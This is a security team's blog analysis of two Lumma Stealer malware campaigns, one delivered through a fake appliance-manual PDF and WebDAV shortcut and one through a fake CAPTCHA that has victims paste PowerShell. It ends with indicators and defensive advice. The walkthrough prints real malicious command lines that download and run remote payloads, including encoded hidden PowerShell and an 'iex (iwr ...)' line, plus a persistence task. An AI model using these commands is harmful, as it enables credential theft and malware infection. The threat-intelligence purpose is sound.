As part of our 2024 Cyber Smart Week blog series, our security team share their thoughts and analysis of some recent Lumma Stealer campaigns...
Dozens of paths can all lead to one place, and on this journey that’s to Lumma Stealer.
What is Lumma?
Lumma Stealer, formerly known as LummaC2, is an information stealer that has been advertised and sold as a Malware-as-a-Service offering on several cybercrime forums since 2022. The malware receives frequent updates and has extensive capabilities, including:
- EDR and AV evasion capabilities:
  - Direct syscalls (relevant reading from MDSec and Outflank).
  - Heaven's Gate, permitting execution of 64-bit code in 32-bit processes.
- Chromium and Mozilla browser password, cookie and history theft.
- Cryptocurrency and MFA browser extension support.
- Discord application token theft.
- Low-level file grabber.
- Integrated reverse proxy (using GhostSocks).
- EXE, DLL, PS1, and LNK payload builders.
Source: LummaC2 Gitbook
The seller, “Shamel”, is also responsible for 7.62mm Stealer:
Lumma subscriptions begin at $250/month and extend to $1000/month. There is also an option to make a one-time $20,000 payment to obtain the stealer and panel source code, and the right to resell it:
From 2023 onwards, Lumma has made steady progress towards becoming the dominant player in the information stealer market. As seen on the log and credit card marketplace “Russian Market”, Lumma is currently the top source of logs by a significant margin:
The potential impact of stealer infections is not limited to the compromise of email accounts and web services. Credential sets purchased from markets like this often include logins that threat actors can use to gain initial access to organisations through their corporate VPN.
Samples
Both of the following samples were discovered in the wild on Tuesday 22nd October, but are associated with campaigns that have been active for multiple months.
PDF leading to Lumma and Amadey
This chain begins with an innocuous-looking Google search result for a site (instructionhub[.]net) offering documentation for household appliances. Reports from both a customer and peers at other MDR providers indicate that victims stumbled across it while trying to find manuals for power tools:
The link lands the user directly in a PDF document, which on the first page offers a link to view the otherwise blurred manual:
This redirects to a WebDAV (Web Distributed Authoring and Versioning) server at all-instructions[.]wsconnect[.]org:
Allowing it to open presents a shortcut file hosted at hXXp://download[.]wsconnect[.]org/Downloads/Instruction_1928_W9COI.pdf.lnk, which tries to conceal itself as a PDF file:
Default Windows security settings will present the user with a warning that the file is remote, and request confirmation to open it:
The shortcut does not point to a specific file and instead initiates the infection chain, beginning with retrieving and executing an Emmenhtal payload from a remote URL using MSHTA:
C:\Windows\System32\forfiles.exe /p C:\Windows /m exp*.exe /c "powershell Start-Process \*i*\*2\msh*e hXXps://pdb[.]timeless-tales[.]shop/api/reg/HardhatSeminar.json"
The Emmenhtal HTA script is contained within a legitimate Notepad executable:
As seen here, the obfuscated JavaScript found in the same file:
This decodes to obfuscated PowerShell, which is run by MSHTA using WScript.Shell:
The hex string is decrypted, and the resulting code is run with Invoke-Expression ($ZwCPJpLIY.Substring(0,3) being “iex”):
This next blob is simply base64-encoded. The effective script downloads an AutoIT loader (update.bin) and script (config.bin), and starts the loader with the script as its single argument:
The decompiled AutoIT script uses a homebrew encryption function to obfuscate itself, but it is essentially a shellcode loader:
Once decrypted, it was found to take the first 172892 bytes of the file (which share strings with confirmed DarkGate samples), decrypt them, initialise a struct of the same size, and execute the struct contents via an EnumWindows callback:
OpenWith.exe is then spawned and Lumma injected into it:
Exfil is made to a path under c1[.]creative-habitat[.]shop:
Two additional files are also retrieved by the OpenWith.exe process:
- An unknown loader (it matched some ModiLoader signatures), used to deliver Amadey. While signed, the signature is invalid.
- Another unknown loader (ldr_clp), used to retrieve an archive (clp.bin) containing an AutoIT loader and script.
The AutoIT script is very similar to the one seen earlier in the chain, used to extract shellcode from the file and execute it through a callback function:
The other loader spawns a new process tree using a well-documented UAC bypass (via the ICMLuaUtil COM interface):
Another more.com process is started, which in turn creates a new explorer process – into which an Amadey payload is loaded:
Amadey begins C2 with hXXp://em3r30[.]updateexpert[.]shop/pLQvfD4d5/index.php:
Copy+Paste PowerShell leading to Lumma
The second example begins with a user being directed to a page that asks them to complete a CAPTCHA, or to take action to resolve a browser issue (as seen in this Proofpoint blog). Multiple variants of this exist, and the form may be embedded within a page:
A message box instructs them to open the Windows Run box, paste the contents of their clipboard and press Enter:
A JavaScript function has been used to copy an encoded PowerShell command to their clipboard, with an additional parameter that hides the PowerShell window:
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -eC aQBlAHgAIAAoAGkAdwByACAAaAB0AHQAcABzADoALwAvAGkAcABsAG8AZwBnAGUAcgAuAHIAdQAvADIANQAwADkAMgA1ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApAC4AQwBvAG4AdABlAG4AdAA=
A PowerShell window is very briefly flashed up, and the infection process begins.
While first observed in the wild, this technique has been more recently refined by security researchers, and a slick demonstration of it open-sourced on GitHub:
Source: X/Twitter
The PowerShell command pulls an additional script from iplogger[.]ru and runs it using Invoke-Expression:
iex (iwr hXXps://iplogger[.]ru/250925 -UseBasicParsing).Content
This downloads a ZIP file, extracts it into the path %TEMP%\file\, and then launches “Set-up.exe” from within that folder:
“Set-up.exe” is a legitimate Thunderbird installer:
All DLLs bundled in the ZIP are signed as expected, with the exception of xpcom_core.dll. This matches the findings that Zscaler made of HijackLoader:
Like the first sample, the sideloaded Thunderbird installer spawns more.com, which drops a large, randomly named file in %TEMP% and injects Lumma into a new SearchIndexer.exe process:
Exfil is made to a path under platformcati[.]sbs:
A further PowerShell script is pulled from onefreex[.]com:
This saves an executable in %TEMP% and launches it. Two oversized files are dropped in the same path:
- “service123.exe”: DLL loader.
- “vErfIqrtTJHPODUCAmMF.dll”: Clipbanker payload.
“service123.exe” is launched and configures a scheduled task named “ServiceData4” which attempts to start this executable every minute. Mutex “QzlqMofVpuyLobHvTcyZ” is used to prevent duplicate instances of the malware from running simultaneously:
"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Artifacts
Indicators of Compromise
Artifact | Type | Value
--- | --- | ---
PDF Host | Domain |
WebDAV Host | Domain |
LNK URL | URL |
MSHTA Execution | PowerShell |
MSHTA Script | URL |
updater.exe | SHA256 |
vtBCQWgJ.bin | SHA256 |
ldr_clp | SHA256 |
clp.bin | SHA256 |
AutoIt3.exe | SHA256 |
Petroleum.imp | SHA256 |
C0ZSRSVCUJHZZQSOI6GLQ3PHZQ9O5G.exe | SHA256 |
Lumma C2 | Domain |
Amadey C2 | Domain |
Fake reCAPTCHA | Domain |
Script | URL |
Thunderbird Archive | URL |
Thunderbird Archive | SHA256 |
xpcom_core.dll | SHA256 |
Script | URL |
Lumma C2 | Domain |
Lumma C2 | Domain |
Lumma C2 | Domain |
Lumma C2 | Domain |
Lumma C2 | Domain |
Lumma C2 | Domain |
Lumma C2 | Domain |
Clipbanker | Mutex |
tmp368B.tmp.exe | SHA256 |
service123.exe | SHA256 |
vErfIqrtTJHPODUCAmMF.dll | SHA256 |
Samples
- Sample 1: https://app.any.run/tasks/ee011753-dace-4038-8d5e-0d73067b5217
- Sample 2: https://app.any.run/tasks/66e0d180-7429-4482-b7cd-64d7a9546728
Response
- Retire legacy antivirus solutions in favour of modern XDR options such as Defender for Endpoint, CrowdStrike or SentinelOne.
- Ensure your XDR platform is configured according to vendor-recommended best practices. This will include:
  - Enabling anti-tamper functionality.
  - Avoiding exclusions wherever possible and, where a conflict between software and the security platform is identified, defining exclusions as specifically as possible. Never define broad exclusions, including those that apply to entire drives or profiles, file types, or system applications that could be abused as a LOLBIN.
- Do not immediately dismiss alerts for system applications as expected behaviour. This is especially common to observe in security programs operated by internal IT resources. Those responsible for detection and response functions must be well-versed in current adversary tradecraft.
- Use a reputable password manager (e.g., 1Password) and avoid saving passwords in browsers.
- There is no single best resource for emerging malware. While a lot is kept within cybersecurity trust groups, X/Twitter can still be a great resource using a list like this one that I maintain.